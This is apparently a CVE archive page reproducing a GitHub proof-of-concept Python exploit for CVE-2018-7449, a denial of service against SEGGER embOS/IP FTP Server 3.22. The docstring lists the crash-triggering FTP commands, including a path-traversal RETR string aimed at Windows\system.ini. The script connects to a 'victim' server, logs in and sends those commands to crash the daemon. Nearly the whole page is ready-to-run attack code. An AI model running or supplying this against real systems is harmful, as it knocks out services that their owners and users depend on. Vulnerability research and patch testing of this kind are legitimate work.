4837 Total CVEs
26 Years
GitHub
Home / 2018 / CVE-2018-7449
README.md
Rendering markdown...
POC / run-exploit.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
"""
	Credits: 	John Page (aka hyp3rlinx)		
	Website: 	hyp3rlinx.altervista.org
	Source:		http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt

	Name: CVE-2018-7449

	Description:	SEGGER embOS/IP FTP Server 3.22 allows
					remote attackers to cause a denial of service 
					(daemon crash) via an invalid LIST, STOR,
					or RETR command.

	Bad chars:		STOR 666\r\n
					LIST\r\n
					RETR '+'..\\'*8+'Windows\system.ini\r\n
	
	Type exploit:	DOS
	
	Platform: 		Unix, Windows
	
	Vendor: 		www.segger.com
"""

#coding=utf-8

#	
#	[+] this script was created from: antogit-sys *
#	[+] URL: https://github.com/antogit-sys/CVE-2018-7449
#	[+] LICENSE: GPLv3
#

import argparse
from exploitFTPModule import *


def main(victim, port, username, password):
	efs = ExploitFTPSegger(victim, port)
	print("[*] Starting Exploit... 🚀")
	print(f"[*] Connect ftp in ({victim}, {port})")


	resp = efs.connectServer()
	if resp != False:
		print("[*] Execute Exploit...")
		exec_exploit(efs, username, password, resp)
	else:
		efs.close_connection()
		print("[✘] failed to connect !!")


def exec_exploit(efs, username, password, r):
	bannerServer = str(r)
	print()
	if "embOS/IP" in bannerServer:
		print("[*] Server response:")
		print(bannerServer)
		print(f"\n[*] Login {efs.ip} server...")
		print(f" ... USER {username}")
		sleep(1)
		print(f" ... PASS {password}")
		sleep(1)
		r = efs.login(username, password)
		if r == False:
			print("\n[✘] username or password incorrect !!")
		else:
			print("\n[*] Server response:")
			print(r)
			print("\n[*] Send Bad Chars... 💀")
			for bc in efs.badchars:
				print(" ... "+bc)
			efs.send_badchars()
		efs.close_connection()

	else:
		print("[✘] this exploit only works on embOS/IP FTP 3.22a servers !!")	

if __name__ == "__main__":
	parser = argparse.ArgumentParser(description="simple python exploit using CVE-2018-7449")
	parser.add_argument("victim", help="Victim server IP embOS/IP FTP Server v3.22")
	parser.add_argument("port", type=int, help="Port server IP embOS/IP FTP Server v3.22")
	parser.add_argument("username", help="username login")
	parser.add_argument("passwd", help="password login")
	args = parser.parse_args()
	main(args.victim, args.port, args.username, args.passwd)